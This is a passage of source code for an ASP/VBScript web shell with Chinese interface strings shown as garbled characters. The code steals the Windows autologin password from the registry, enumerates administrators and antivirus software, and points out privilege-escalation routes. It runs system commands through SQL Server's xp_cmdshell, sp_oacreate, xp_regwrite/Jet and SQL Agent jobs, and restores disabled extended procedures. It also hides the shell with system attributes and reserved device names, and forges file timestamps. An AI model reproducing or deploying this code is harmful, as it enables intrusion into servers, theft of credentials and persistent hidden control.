If PAWPort="" then PAWPort="ÎÞ·¨"&"»ñÈ¡.ÇëÈ·ÈÏ"&"Ö÷»úÊÇ"&"·ñ°²×°pcAnywhere"
j"<li>PcAnywhere¶Ë¿ÚÎª:"&PAWPort&"<br>"
j"------------------------------------------------------"
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
j"ÖÕ¶Ë_·þÎñ¶Ë¿Ú"&"¼°×Ô¶¯µÇÂ¼<ol>"
If termPort = "" Or Err.Number <> 0 Then
j"ÎÞ·¨µÃµ½ÖÕ¶Ë¶Ë¿Ú, ¼ì²éÈ¨ÏÞÊÇ·ñÊÜµ½ÏÞÖÆ.<br/>"
 Else
j"µ±Ç°ÖÕ¶Ë·þÎñ"&"¶Ë¿Ú: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
j"×Ô¶¯µÇÂ¼"&"µÄÏµÍ³ÕÊ»§: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
j"False"
End If
j"×Ô¶¯µÇÂ¼"&"µÄÕÊ»§ÃÜÂë: " & autoLoginPassword & "<br>"
End If
j"</ol>"
j"<br><br><br>[ÏµÍ³Èí_¼þÌ½²â]<br><hr size=1>"
SoftPath=Wsh.Environment.item("Path")
Pathinfo=lcase(SoftPath)
j"ÏµÍ³Èí"&"¼þÖ§³Ö:"
if Instr(Pathinfo,"perl") Then j"<li>Perl½Å±¾_:Ö§³Ö<br>"
if instr(Pathinfo,"java") Then j"<li>Java½Å±¾_:Ö§³Ö<br>"
if instr(Pathinfo,"microsoft sql server") Then j"<li>MSSQLÊý¾Ý¿â·þÎñ_:Ö§³Ö<br>"
if instr(Pathinfo,"mysql") Then j"<li>MySQLÊý¾Ý¿â·þÎñ_:Ö§³Ö<br>"
if instr(Pathinfo,"oracle") Then j"<li>OracleÊý¾Ý¿â·þÎñ_:Ö§³Ö<br>"
if instr(Pathinfo,"cfusionmx7") Then j"<li>CFM·þÎñÆ÷_:Ö§³Ö<br>"
if instr(Pathinfo,"pcanywhere") Then j"<li>ÈüÃÅÌú¿ËPcAnywhere¿ØÖÆ_:Ö§³Ö<br>"
if instr(Pathinfo,"Kill") Then j"<li>KillÉ±¶¾Èí¼þ_:Ö§³Ö<br>"
if instr(Pathinfo,"kav") Then j"<li> ½ðÉ½ÏµÁÐÉ±¶¾Èí¼þ_:Ö§³Ö<br>"
if instr(Pathinfo,"antivirus") Then j"<li>ÈüÃÅÌú¿ËÉ±¶¾Èí¼þ_:Ö§³Ö<br>"
if instr(Pathinfo,"rising") Then j"<li>ÈðÐÇÏµÁÐÉ±¶¾Èí¼þ_:Ö§³Ö<br>"
paths=split(SoftPath,";")
j"------------------------------------<br>"
j"ÏµÍ³µ±Ç°_Â·¾¶±äÁ¿:<br>"
For i=Lbound(paths) to Ubound(paths)
j"<li>"&paths(i)&"<br>"
next
j"<br><br>[ÏµÍ³ÉèÖÃ_Ì½²â]<br><hr size=1>"
pcnamekey="HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName"
pcname=wsh.RegRead(pcnamekey)
if pcname="" Then pcname="ÎÞ·¨¶Á_È¡Ö÷»úÃû.<br>"
j"<li>µ±Ç°Ö÷_»úÃûÎª:"&pcname&"<br>"
AdminNameKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName"
AdminName=wsh.RegRead(AdminNameKey)
if adminname="" Then AdminName="Administrator"
Response.Expires=0
on error resume next
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
j "<li>¹ÜÀíÔ±ÓÃ»§£º"&admin.Name&"<br></li>"
Next
if err then
j"ËûÄÌÄÌµÄ²»ÐÐ°¡:Wscript.Network"
end if

j"<li>Ä¬ÈÏ¹ÜÀí"&"Ô±ÓÃ»§ÃûÎª:<font color=red>"&AdminName&"<br></font>"

isAutologin="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon"
Autologin=Wsh.RegRead(isAutologin)
if Autologin=0 or Autologin="" Then
j"<li>ÓÃ»§×Ô_¶¯µÇÈë:Î´ÆôÓÃ<br>"
Else
j"<li>ÓÃ»§×Ô_¶¯µÇÈë:ÆôÓÃ<br>"
Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")
Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword")
j"<li type=square>ÓÃ»§Ãû:"&Admin&"<br>"
j"<li type=square><font color=red>ÃÜÂë:"&Passwd&"<br></font>"
End if
displogin=wsh.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName")
If displogin="" or displogin=0 Then disply="ÊÇ" else disply="·ñ"
j"<li>ÊÇ·ñÏÔÊ¾ÉÏ_´ÎµÇÈëÓÃ»§:"&disply&"<br>"
NTMLkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\NTML"
ntml=Wsh.RegRead(NTMLkey)
if ntml="" Then Ntml=1
j"<li>Telnet NtmlÉèÖÃÎª:"&ntml&"<br>"
hk="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count"
kk=wsh.RegRead(hk)
j"<li>µ±Ç°»î¶¯_Íø¿¨Îª:"&kk&"<br>"
j"------------------------------------<br><br><br>"
j"[·þÎñÆ÷Èõ_µãÌ½²â]<br><hr>"
Set objComputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("Shell.Application")
objComputer.Filter = Array("Service")
On Error Resume Next
For Each objService In objComputer
if objService.Name="Serv-U" Then
if objService.ServiceAccountName="LocalSystem" Then
j"<li>·þÎñÆ÷ÖÐÓÐ_Serv-U°²×°,ÇÒÒÔLocalSystemÈ¨ÏÞÆô¶¯,¿ÉÒÔ¿¼ÂÇÓÃsu.exe¹¤¾ßÌáÈ¨<br>"
End if
End if
if lcase(objService.Name)="apache" Then
if objService.ServiceAccountName="LocalSystem" Then
If instr(Request.ServerVariables("SERVER_SOFTWARE"),"Apache") Then
j"<li>µ±Ç°WEB·þÎñÆ÷ÎªApache.¿ÉÒÔÖ±½ÓÌáÈ¨<br>"
Else
j" <li>·þÎñÆ÷ÖÐÓÐ_Apache·þÎñ´æÔÚ,Æô¶¯È¨ÏÞÎªLocalSystem,¿ÉÒÔ¿¼ÂÇPHPÄ¾Âí<br>"
End if
end if
End if
if instr(lcase(objService.Name),"tomcat") Then
if objService.ServiceAccountName="LocalSystem" Then
j"<li>·þÎñÆ÷ÖÐÓÐ_Tomcat,ÇÒÒÔLocalSystemÈ¨ÏÞÆô¶¯,¿ÉÒÔ¿¼ÂÇÊ¹ÓÃJspÄ¾ÂíÌáÈ¨<br>"
End if
End if
if instr(lcase(objService.Name),"winmail") Then
if objService.ServiceAccountName="LocalSystem" Then
j"<li>·þÎñÆ÷ÖÐÓÐ_Magic Winmail,ÇÒÒÔLocalSystemÈ¨ÏÞÆô¶¯,¿ÉÒÔ²éÕÒWebMailÄ¿Â¼,²¢ÇÒÐ´ÈëPHPÄ¾Âí<br>"
End if
End if
Next
Set fso=Server.Createobject("Scripting.FileSystemObject")
Sysdrive=left(Fso.GetspecialFolder(2),2)
servername=wsh.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName")
If fso.FileExists(sysdriver&"\Documents And Settings\All Users\Application Data\Symantec\"&servername&".cif") Then
j"<li>·¢ÏÖ_pcAnywhereÃÜÂëÎÄ¼þ,¿ÉÒÔ´ÓÄ¬ÈÏÄ¿Â¼ÏÂÔØ²¢ÆÆ½âµÃµ½pcAnywhereÃÜÂë"
End if

End Sub
sub promyself()
On Error Resume Next
set f=fso.GetFile(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")))
if f.Attributes <> 39 then
f.Attributes=39
end if
set f=nothing
end sub
function sql()
if session("login")="" then
        j"<br><center><font color=red>Ã»ÓÐµÇÂ½</font></center>"
	else
	j"<br><center><a href="&request.servervariables("url")&"?Action=sql&sqlaaa=logout><font color=red>ÍË³öµÇÂ½</font></a></center>"
end if
if session("login")="" then
	j"<table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
	j"<tr><td height='20' align='center'>SQLÌáÈ¨</td></tr>"
	j"<tr><td><Br><form name=form method=post sqlaaa="&request.servervariables("url")&">"
	j"<p>&nbsp;SqlÓÃ»§Ãû£º"
	j"<input name=name type=text id=name value="&session("name")&">"
	j"&nbsp;SqlÃÜÂë£º"
	j"<input name=pass type=text id=pass value="&session("pass")&">"
	j"<p>&nbsp;Sql·þÎñÆ÷£º"
	j"<input name=port type=text id=server value=127.0.0.1>"
	j"&nbsp;Sql¶Ë¿Ú£º"
	j"<input name=port type=text id=port value=1433>"
	j"&nbsp;<input name=sqlaaa type=submit value=login>"
	j"</form></td></tr></table>"
else
	j"<table width='600' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
	j"<tr><td height='20' align='center' bgcolor='menu'>SQLÌáÈ¨</td></tr>"
	j"<tr><td><Br><form name=form method=post sqlaaa="&request.servervariables("url")&"><p>"
	j"&nbsp;×é¼þ¼ì²â£º<input name=sqlaaa type=hidden value=test><input type=submit value=¼ì²â×é¼þ></form>"
	j"<form name=form method=post sqlaaa="&request.servervariables("url")&"><p>"
	j"&nbsp;×é¼þ»Ö¸´£º<input name=sqlaaa type=hidden value=resume><input type=submit value=»Ö¸´×é¼þ></form>"
	j"<form name=form method=post sqlaaa="&request.servervariables("url")&"><p>"
	j"&nbsp;ÏµÍ³ÃüÁî£º<input name=cmd type=text>&nbsp;"
	j"<select name='tool' ><option value=''>Ñ¡ÔñÔËÐÐ³ÌÐòµÄ×é¼þ</option><option value=xp_cmdshell>xp_cmdshell</option><option value=sp_oacreate>sp_oacreate</option><option value=xp_regwrite>xp_regwrite</option><option value=sqlserveragent>sqlserveragent</option></option></select>"
	j"<input name=sqlaaa type=hidden value=cmd>&nbsp;&nbsp;"
	j"<input type=submit value=Ö´ÐÐ>"
	j"</form>"
	j"<form name=form1 method=post sqlaaa="&request.servervariables("url")&">"
	j"<p>&nbsp;Ö´ÐÐÓï¾ä£º"
	j"<input name=sql type=text>"
	j"<input name=sqlaaa type=hidden value=sql>&nbsp;&nbsp;"
	j"<input type=submit value=Ö´ÐÐ>"
	j"</form></td></tr></table><br>"

end if
if request("sqlaaa")="login" then
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & request.form("server") & "," & request.form("port") & ";password=" & request.form("pass") & ";uid=" & request.form("name")
    if err.number=-2147467259 then
    j"<font color=red>Êý¾ÝÔ´Á¬½Ó´íÎó£¬Çë¼ì²é£¡</font>"
    response.end
elseif err.number=-2147217843 then
    j"<font color=red>ÓÃ»§ÃûÃÜÂë´íÎó´íÎó£¬Çë¼ì²é£¡</font>"
    response.end
elseif err.number=0 then
    strquery="select @@version"
		set recresult = adoconn.execute(strquery)
		j"<table align='center' width='600'><hr><br><font color=red>"
if instr(recresult(0),"NT 5.0") then
		j"Windows 2000ÏµÍ³"
    session("system")="2000"
    elseif instr(recresult(0),"NT 5.1")  then
    j"Windows xpÏµÍ³"
    session("system")="xp"
    elseif instr(recresult(0),"NT 5.2")  then
    j"Windows 2003ÏµÍ³"
    session("system")="2003"
    else
    j"ÆäËü²Ù×÷ÏµÍ³"
    session("system")="no"
    end if
    strquery="select is_srvrolemember('sysadmin')"
       set recresult = adoconn.execute(strquery)
    if recresult(0)=1 then
    j"<br>¹§Ï²£¡SQL Server×î¸ßÈ¨ÏÞ</font><br><hr></table>"
    session("pri")=1
    else
    j"<br>ÓôÃÆ£¬È¨ÏÞ²»¹»¹À¼Æ²»ÄÜÖ´ÐÐÃüÁî£¡</font><br><hr></table>"
    session("pri")=0
    end if
		session("login")="yes"
		session("name")=request.form("name")
		session("pass")=request.form("pass")
		session("server")=request.form("server")
		session("port")=request.form("port")
		j"<meta http-equiv='refresh' content='1;URL=?Action=sql'>"
End if

Elseif request("sqlaaa")="test"  then
    if session("login")<>"" then
    j"<table align='center' width='600'><hr><br><font color=red>"
    if session("system")="2000" then
    j"Windows 2000ÏµÍ³"
    elseif session("system")="xp" then
    j"Windows xpÏµÍ³"
    elseif session("system")="2003" then
    j"Windows 2003ÏµÍ³"
    else
    j"ÆäËü²Ù×÷ÏµÍ³"
    end if
    if session("pri")=1 then
    j"<br>¹§Ï²£¡SQL Server×î¸ßÈ¨ÏÞ</font><br>"
    else
    j"<br>ÓôÃÆ£¬È¨ÏÞ²»¹»¹À¼Æ²»ÄÜÖ´ÐÐÃüÁî£¡</font><br>"
end if
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")

    strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'"
    set recresult = adoconn.execute(strquery)
    j"<font color=red>"
    if recresult(0) then
    session("xp_cmdshell")=1
    j"xp_cmdshell............. ´æÔÚ!"
    else
    session("xp_cmdshell")=0
    j"xp_cmdshell............. ²»´æÔÚ!"
    end if
    strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_oacreate'"
    set recresult = adoconn.execute(strquery)
    if recresult(0) then
    j"<br>sp_oacreate............. ´æÔÚ!"
    session("sp_oacreate")=1
    else
    j"<br>sp_oacreate............. ²»´æÔÚ!"
    session("sp_oacreate")=0
    end if
    strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'"
    set recresult = adoconn.execute(strquery)
    if recresult(0) then
    j"<br>xp_regwrite............. ´æÔÚ!"
    session("xp_regwrite")=1
    else
    j"<br>xp_regwrite............. ²»´æÔÚ!"
    session("xp_regwrite")=0
    end if
    strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_servicecontrol'"
    set recresult = adoconn.execute(strquery)
    if recresult(0) then
    j"<br>xp_servicecontrol....... ´æÔÚ!</font><hr></table>"
    session("xp_servicecontrol")=1
    else
    j"<br>xp_servicecontrol....... ²»´æÔÚ!</font><hr></table>"
    session("xp_servicecontrol")=0
    end if
    else
    j"<script>alert('²Ù×÷³¬Ê±£¬ÖØÐÂµÇÂ½£¡')</script>"
    j"<center><a href="&request.servervariables("url")&"?Action=sql&sqlaaa=logout><font color=black>µÇÂ½³¬Ê±</font>"
    response.end
    end if

elseif request("sqlaaa")="cmd" then
    if session("login")<>"" then
    if session("pri")=1 then
    if request("tool")="xp_cmdshell" then
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")
    if request.form("cmd")<>"" then
      strquery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'"
    set recresult = adoconn.execute(strquery)
    if not recresult.eof then
    do while not recresult.eof
    strresult = strresult & chr(13) & recresult(0)
    recresult.movenext
    loop
    end if
    set recresult = nothing
    j"<table align='center' width='600'><hr>ÀûÓÃ"&request("tool")&"À©Õ¹Ö´ÐÐ&nbsp;&nbsp;C:\windows\system32>"&request.form("cmd")&"<br>"
    j"<textarea style='width:600;height:250'>"
    j strresult
    j"</textarea><hr></table>"
end if

elseif request("tool")="sp_oacreate" then
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")
if request.form("cmd")<>"" then
      strquery = "create table [jnc](resulttxt nvarchar(1024) null);use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "&request("cmd")&" > 8617.tmp',0,true;bulk insert [jnc] from '8617.tmp' with (keepnulls);"
    adoconn.execute(strquery)
    strquery = "select * from jnc"
    set recresult = adoconn.execute(strquery)
if not recresult.eof then
  do while not recresult.eof
    strresult = strresult & chr(13) & recresult(0)
    recresult.movenext
    loop
end if
    set recresult = nothing
    j"<table align='center' width='600'><hr>ÀûÓÃ"&request("tool")&"À©Õ¹Ö´ÐÐ&nbsp;&nbsp;C:\windows\system32>"&request.form("cmd")&"<br>"
    j"<textarea style='width:600;height:250'>"
    j strresult
    j"</textarea><hr></table>"
    strquery = "drop table [jnc];declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c del 8617.tmp'"
    adoconn.execute(strquery)
end if

elseif request("tool")="xp_regwrite" then
    if session("system")="2000" then
    path="c:\winnt\system32\ias\ias.mdb"
    else
    path="c:\windows\system32\ias\ias.mdb"
    end if
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")
    if request.form("cmd")<>"" then
    cmd=chr(34)&"cmd.exe /c "&request.form("cmd")&" > 8617.tmp"&chr(34)
    strquery = "create table [jnc](resulttxt nvarchar(1024) null);exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',0;select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&cmd&")');"
    adoconn.execute(strquery)
    strquery = "select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&chr(34)&"cmd.exe /c copy 8617.tmp jnc.tmp"&chr(34)&")');bulk insert [jnc] from 'jnc.tmp' with (keepnulls);"
    set recresult = adoconn.execute(strquery)
    strquery="select * from [jnc];"
    set recresult = adoconn.execute(strquery)
    if not recresult.eof then
    do while not recresult.eof
    strresult = strresult & chr(13) & recresult(0)
    recresult.movenext
    loop
    end if
    set recresult = nothing
    j"<table align='center' width='600'><hr>ÀûÓÃ"&request("tool")&"À©Õ¹Ö´ÐÐ&nbsp;&nbsp;C:\windows\system32>"&request.form("cmd")&"<br>"
    j"<textarea style='width:600;height:250'>"
    j strresult
    j"</textarea><hr></table>"
    strquery = "drop table [jnc];exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&chr(34)&"cmd.exe /c del 8617.tmp&&del jnc.tmp"&chr(34)&")');"
    adoconn.execute(strquery)
end if

elseif request("tool")="sqlserveragent" then
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")

if request.form("cmd")<>"" then
    if session("sqlserveragent")=0 then
    strquery = "exec master.dbo.xp_servicecontrol 'start','sqlserveragent';"
    adoconn.execute(strquery)
    session("sqlserveragent")=1
end if

    strquery = "use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "&request.form("cmd")&"' exec sp_add_jobserver null,'x',@@servername exec sp_start_job 'x';"
    adoconn.execute(strquery)
    adoconn.execute(strquery)
    adoconn.execute(strquery)

    j"<table align='center' width='600'><hr>ÀûÓÃ"&request("tool")&"À©Õ¹Ö´ÐÐ&nbsp;&nbsp;C:\windows\system32>"&request.form("cmd")&"<br>"
    j"<textarea style='width:600;height:250'>"
    j vbcrf
    j"´ËÀ©Õ¹ÎÞ»ØÏÔ£¬½¨ÒéÍ¨¹ýÖØ¶¨Ïò²é¿´ÃüÁî½á¹û"
    j"</textarea><hr></table>"
    strquery = "use msdb drop table [jncsql];"
    adoconn.execute(strquery)
    end if
    elseif request("tool")="" then
    j"<script>alert('Ñ¡ÔñÄãÒªÊ¹ÓÃµÄÀ©Õ¹')</script>"
    end if
    else
    j"<script>alert('È¨ÏÞ²»¹»Å¶£¡')</script>"
    end if
    else
    j"<script>alert('²Ù×÷³¬Ê±£¬ÖØÐÂµÇÂ½£¡')</script>"
    j"<center><a href="&request.servervariables("url")&"?Action=sql&sqlaaa=logout><font color=black>µÇÂ½³¬Ê±</font>"
    response.end
    end if

elseif request("sqlaaa")="resume" then
    if session("login")<>"" then
    set adoconn=server.createobject("adodb.connection")
    adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")
    if session("xp_cmdshell")=0 then
    strquery="dbcc addextendedproc ('xp_cmdshell','xplog70.dll')"
    adoconn.execute(strquery)
    j"<table align='center' width='600'><hr><font color=red>ÒÑ¾³¢ÊÔ»Ö¸´xp_cmdshell</font><hr></table>"
    elseif session("sp_oacreate")=0 then
    strquery="dbcc addextendedproc ('sp_oacreate','odsole70.dll')"
    adoconn.execute(strquery)
    j"<table align='center' width='600'><hr><font color=red>ÒÑ¾³¢ÊÔ»Ö¸´sp_oacreate</font><hr></table>"
    elseif session("xp_regwrite")=0 then
    strquery="dbcc addextendedproc ('xp_regwrite','xpstar.dll')"
    adoconn.execute(strquery)
    j"<table align='center' width='600'><hr><font color=red>ÒÑ¾³¢ÊÔ»Ö¸´xp_regwrite</font><hr></table>"
    elseif session("xp_servicecontrol")=0 then
    strquery="dbcc addextendedproc ('xp_servicecontrol','xprepl.dll')"
    adoconn.execute(strquery)
    j"<table align='center' width='600'><hr><font color=red>ÒÑ¾³¢ÊÔ»Ö¸´xp_servicecontrol</font><hr></table>"
    else j"<table align='center' width='600'><hr><font color=red>¹§Ï²£¡×é¼þÆëÈ«</font><hr>"
    end if
    else
    j"<script>alert('²Ù×÷³¬Ê±£¬ÖØÐÂµÇÂ½£¡')</script>"
    j"<center><a href="&request.servervariables("url")&"?Action=sql&sqlaaa=logout><font color=black>µÇÂ½³¬Ê±</font>"
    response.end
end if
elseif request("sqlaaa")="sql" then
    if session("login")<>"" then
    if request.form("sql")<>"" then
    set adoconn=server.createobject("adodb.connection")
     adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name")
    strquery=request.form("sql")
    set recresult = adoconn.execute(strquery)
    if not recresult.eof then
    do while not recresult.eof
    strresult = strresult & chr(13) & recresult(0)
    recresult.movenext
    loop
    end if
    set recresult = nothing
    j"<table align='center' width='600'><hr><textarea style='width:600;height:250'>"
    j"Ö´ÐÐsqlÓï¾ä:"
    j request.form("sql")
    j strresult
    j"</textarea><hr></table>"
    end if
    else
    j"<script>alert('²Ù×÷³¬Ê±£¬ÖØÐÂµÇÂ½£¡')</script>"
    j"<center><a href="&request.servervariables("url")&"?Action=sql&sqlaaa=logout><font color=black>µÇÂ½³¬Ê±</font>"
    response.end
    end if
end if

if request("sqlaaa")="logout" then
    set adoconn=nothing
    session("login")=""
    session("name")=""
    session("pass")=""
    session("server")=""
    session("port")=""
    session("system")=""
    session("pri")=""
    j"<meta http-equiv='refresh' content='1;URL=?Action=sql'>"
end if
end function

Sub Message(state,msg,flag)
j"<TABLE width=60% border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
j state
j"</FONT></TD><TR><TD><P>"&msg
j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
If flag=0 Then
j" <INPUT type=button value=¹Ø±Õ onclick='window.close();'>"
Else
End if
j"</TD></TR></TABLE>"
End Sub
Function Red(str)
Red = "<FONT color=#ff2222>" & str & "</FONT>"
End Function

function datess
response.write "<form method=post>"
response.write "Â· ¾¶£º<input name=path value='"&server.mappath("/")&"\' size='30'>(Ò»¶¨ÒªÒÔ\½áÎ²)<br />"
response.write "ÎÄ¼þÃû³Æ£º<input name=filename value='test.txt' size='30'><br />"
response.write "ÐÞ¸ÄÊôÐÔ£º<input name=attri value='1+2+4' size='30'>(1ÎªÖ»¶Á2ÎªÒþ²Ø4ÎªÏµÍ³)<br />"
response.write "ÐÞ¸ÄÊ±¼ä£º<input name=time value='12/30/2010 12:30:30' size='30'><br />"
response.write "<input type=submit value=ÐÞ¸Ä²¢Òþ²ØÎÄ¼þ>"
response.write "</form>"

'»ñÈ¡Ìá½»µÄ²ÎÊý
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")
set attri=request.Form("attri")
if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

'Í¨¹ýfsoÉèÖÃÎÄ¼þÊôÐÔ
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=attri 'ÉèÖÃÎÄ¼þÊôÐÔÎªÒþ²Ø+ÏµÍ³

'Í¨¹ýshell.ApplicationÐÞ¸ÄÎÄ¼þµÄ×îºóÐÞ¸ÄÊ±¼ä
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime
end if
end function
sub hiddenshell
fpath=request.servervariables("path_translated")
set fso=server.createobject("scripting.filesystemobject")
pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
rndpex=split(pex,"|")(rndnumber(0,17))
session("seljw")=""
filepath1=server.mappath(".")
filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
url2=request.servervariables("url")
url2=left(url2,instrrev(url2,"/"))&rndpex&"."&filename1
fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
Set namesf=fso.GetFile("\\.\"&filepath1&"\"&rndpex&"."&filename1)
namesf.attributes = 39
set fso=nothing
set namesf=nothing
j "<br><br><br><br><br><br><center>²»ËÀ½©Ê¬´´½¨ÖÐ......</center>"
j "<script>window.location='http://"&request("server_name")&url2&"';</script>"
end sub
Function RndNumber(Min,Max)
Randomize
RndNumber=Int((Max - Min + 1) * Rnd() + Min)
End Function
Sub ScanDriveForm()
On Error Resume Next
Dim FSO,DriveB
Set FSO = Server.Createobject("Scripting.FileSystemObject")
path_arr = vbcrlf&"c:\php\"&vbcrlf&"d:\Program Files\"&vbcrlf&"C:\Documents and Settings\All Users\Documents\"&vbcrlf&"C:\recycler\"&vbcrlf&"d:\recycler\"&vbcrlf&"e:\recycler\"&vbcrlf&"f:\recycler\"&vbcrlf&"c:\recycled\"&vbcrlf&"C:\wmpub\"&vbcrlf&"C:\360rec\"&vbcrlf&"C:\cache\"&vbcrlf&"C:\JPEGCapture\"&vbcrlf&"C:\Inetpub\"&vbcrlf&"c:\TDDOWNLOAD\"&vbcrlf&"d:\TDDOWNLOAD\"&vbcrlf&"e:\TDDOWNLOAD\"&vbcrlf&"e:\wwwroot\"&vbcrlf&"d:\wwwroot\"&vbcrlf&"C:\Program Files\"&vbcrlf&"c:\docume~1\alluse~1\Application Data\Symantec\pcAnywhere"&vbcrlf&"C:\Documents and Settings\All Users\×ÀÃæ\"&vbcrlf&"c:\mysql\"&vbcrlf&"C:\windows\system32\spool\PRINTERS\"&vbcrlf&"C:\WINDOWS\IIS Temporary Compressed Files\"&vbcrlf&"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files"&vbcrlf&"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files"&vbcrlf&"C:\Documents and Settings\NetworkService\Local Settings\Temp"&vbcrlf&"C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files"&vbcrlf&"C:\Windwos\system32\inetsrv\data\"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\"&vbcrlf&"C:\php\PEAR\"&vbcrlf&"C:\Program Files\Zend\ZendOptimizer-3.3.0\"&vbcrlf&"C:\Program Files\Common Files\"&vbcrlf&"C:\7i24.com\iissafe\log\"&vbcrlf&"C:\WINDOWS\7i24.com\FreeHost"&vbcrlf&"C:\RECYCLER"&vbcrlf&"C:\windows\temp\"&vbcrlf&"c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\"&vbcrlf&"C:\Program Files\Symantec AntiVirus\SAVRT\"&vbcrlf&"C:\~1  "&vbcrlf&"C:\System Volume Information  "&vbcrlf&"C:\Program Files\Zend\ZendOptimizer-3.3.0\docs"&vbcrlf&"C:\Documents and Settings\All Users\DRM\"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\360safe\softmgr\"&vbcrlf&"c:\documents and settings\all users\application data\symantec\liveupdate\"&vbcrlf&"c:\HostMonitor\"&vbcrlf&"c:\program files\ggsafe\temp\"&vbcrlf&"C:\Program Files\freeime\skin\blueness"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\Cookie\"&vbcrlf
